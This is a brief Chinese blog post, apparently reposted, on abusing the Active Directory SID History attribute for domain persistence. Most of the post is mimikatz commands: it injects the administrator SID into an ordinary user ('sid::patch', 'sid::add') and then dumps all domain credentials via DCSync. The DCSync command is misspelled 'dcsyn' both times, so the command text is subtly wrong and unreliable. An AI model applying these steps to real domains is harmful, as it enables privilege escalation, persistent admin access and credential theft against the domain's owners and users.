SID History 域维权

news2025/3/3 13:22:43

SID History 域林攻击：域林攻击详解-CSDN博客

根据微软的描述，SID History 属性是微软对域内用户进行域迁移的支持而创建的。每当对象从一个域移动到另一个域时，都会创建一个新的 SID，并且该新 SID 将成为 objectSID。先前的 SID 会添加到 SID History 属性中，以确保该用户迁移后仍然能访问迁移前能访问的资源。

mimikatz.exe

lsadump::dcsyn /all /csv

# 无权限。

# 将 administrator 的 sid 添加到 deandean 的 SID History 属性中

privilege::debug

sid::patch

sid::add /sam:deandean /new:administrator

重新攻击

mimikatz.exe

lsadump::dcsyn /all /csv
# 域控认为用户 deandean 是 administrator 迁移的，所以给他 administrator

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2308357.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！